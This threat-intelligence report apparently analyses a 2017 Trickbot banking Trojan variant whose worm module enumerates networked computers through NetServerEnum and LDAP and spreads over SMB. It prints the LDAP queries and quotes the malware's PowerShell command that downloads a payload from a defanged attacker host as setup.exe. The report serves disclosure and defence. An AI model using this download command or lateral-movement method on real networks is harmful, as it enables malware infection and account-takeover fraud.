On July 27, 2017, in coordination with Luciano Martins, Director of Cyber Risk Services at Deloitte, Flashpoint observed a new version – “1000029” – of the formidable “Trickbot” banking Trojan with a new “worm64Dll” module, spread via the email spam vector, impersonating invoices from a large international financial institution.

Image 1: The latest Trickbot tt0002 config that was served via the spam campaign.

The Trickbot gang appears to be testing a worm-like malware propagation module, which appears to spread locally via Server Message Block (SMB), scan domains for lists of servers via NetServerEnum Windows API, and enumerate other computers via Lightweight Directory Access Protocol (LDAP) enumeration. As of this writing, this malware feature does not appear to be fully implemented by the criminal gang as the initial purported SMB exploit has not yet been observed.

Image 2: Trickbot’s worm module obtains a list of servers via NetServerEnum and scans LDAP resources.

The Trickbot’s “MachineFinder” and “netscan” functions appear to leverage the following techniques:

• NetServer Enumeration function

• LDAP Enumeration

Image 3: The NetServerEnum function lists all servers of the specified type that are visible in a domain.

Trickbot’s worm module also creates queries enumerating LDAP as follows:

• (objectCategory=computer)

• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

More specifically, the malware appears to enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.

Image 4: Trickbot queries LDAP for all computers that are not domain controllers.

The Trickbot module also appears to contain strings indicative of its usage of the Python implementation of the SMB protocol “pysmb,” leveraging authentication via NT LM 0.12 querying for Windows 2007, Windows 7, Windows 2012, and Windows 8 Operating Systems (OS).

Images 5-6: The observed Trickbot worm module leverages SMB to determine exploitation; however, the module does not appear to be fully implemented yet.

Finally, the malware appears to leverage the IPC (interprocess communication) share to propagate and execute a PowerShell script as a final payload to download another Trickbot malware, masked as “setup[.]exe,” into the shared drive. Notably, this malware does not appear to have logic to randomly scan external IPs for SMB connections – as was the case for the worm that spread the “WannaCry” ransomware in May 2017.

The following PowerShell script was observed in the worm module:

powershell -Command “(New-Object Net.WebClient).DownloadFile(‘hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe’, ‘setup[.]exe’)”

Assessment

The Trickbot banking Trojan gang continues to have a global impact, targeting various financial instructions across the world and tirelessly proliferating sizable daily spam waves impacting various geographies. Now, the gang appears to be testing a new module with worm-like capabilities for lateral movement, i.e., the ability to infect other computers on the same Local Area Network (LAN) with the goal of infecting more victims and enlisting them as part of the botnet. Such worm-like infections might add the Trickbot gang to expand a number of customers of financial institutions in an effort to conduct more account takeover (ATO) fraud.

Even though the worm module appears to be rather crude in its present state, it is evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and “NotPetya” and is attempting to replicate their methodology. Flashpoint assesses with moderate confidence that the Trickbot gang will likely continue to be a formidable force in the near term.